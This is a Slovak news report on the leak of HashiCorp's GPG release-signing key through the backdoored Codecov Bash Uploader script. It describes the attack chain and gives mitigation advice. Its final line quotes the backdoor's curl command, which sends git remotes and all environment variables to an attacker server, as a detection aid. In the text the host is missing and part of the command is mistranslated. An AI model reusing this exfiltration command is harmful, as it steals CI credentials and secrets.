HashiCorp, známy vývojom open source nástrojov Vagrant, Packer, Nomad a Terraform, oznámil únik súkromného kľúča GPG používaného na vytváranie digitálnych podpisov, ktoré overujú vydania. Útočníci, ktorí získali prístup ku kľúču GPG, mohli potenciálne vykonať skryté zmeny v produktoch HashiCorp ich overením pomocou správneho digitálneho podpisu. Spoločnosť zároveň uviedla, že počas auditu neboli zistené žiadne stopy po pokusoch o takéto úpravy.
V súčasnosti bol napadnutý kľúč GPG odvolaný a namiesto neho bol zavedený nový kľúč. Problém ovplyvnil iba overenie pomocou súborov SHA256SUM a SHA256SUM.sig a neovplyvnil generovanie digitálnych podpisov pre balíčky Linux DEB a RPM dodávané prostredníctvom releases.hashicorp.com, ako aj mechanizmy overovania vydania pre macOS a Windows (AuthentiCode) .
K úniku došlo v dôsledku použitia skriptu Codecov Bash Uploader (codecov-bash) v infraštruktúre, ktorý je určený na sťahovanie správ pokrytia zo systémov nepretržitej integrácie. Pri útoku na spoločnosť Codecov boli do zadaného skriptu skryté zadné vrátka, cez ktoré sa na server útočníkov posielali heslá a šifrovacie kľúče.
Na hacknutie útočníci využili chybu v procese vytvárania obrazu Codecov Docker, čo im umožnilo extrahovať prístupové údaje do GCS (Google Cloud Storage), ktoré sú potrebné na vykonanie zmien v skripte Bash Uploader distribuovanom z codecov.io. webovej stránky. Zmeny boli vykonané 31. januára, zostali nezistené dva mesiace a umožnili útočníkom extrahovať informácie uložené v prostrediach systémov nepretržitej integrácie zákazníkov. Pomocou pridaného škodlivého kódu by útočníci mohli získať informácie o testovanom úložisku Git a všetkých premenných prostredia vrátane tokenov, šifrovacích kľúčov a hesiel prenášaných do systémov nepretržitej integrácie na organizáciu prístupu ku kódu aplikácie, úložiskám a službám, ako sú Amazon Web Services a GitHub.
Okrem priameho volania bol skript Codecov Bash Uploader použitý v rámci iných uploaderov, ako Codecov-action (Github), Codecov-circleci-orb a Codecov-bitrise-step, ktorých používateľov sa problém tiež týka. Všetkým používateľom codecov-bash a príbuzných produktov sa odporúča vykonať audit svojej infraštruktúry, ako aj zmeniť heslá a šifrovacie kľúče. Prítomnosť zadných vrátok v skripte môžete skontrolovať prítomnosťou riadku curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || pravda
Zdroj: opennet.ru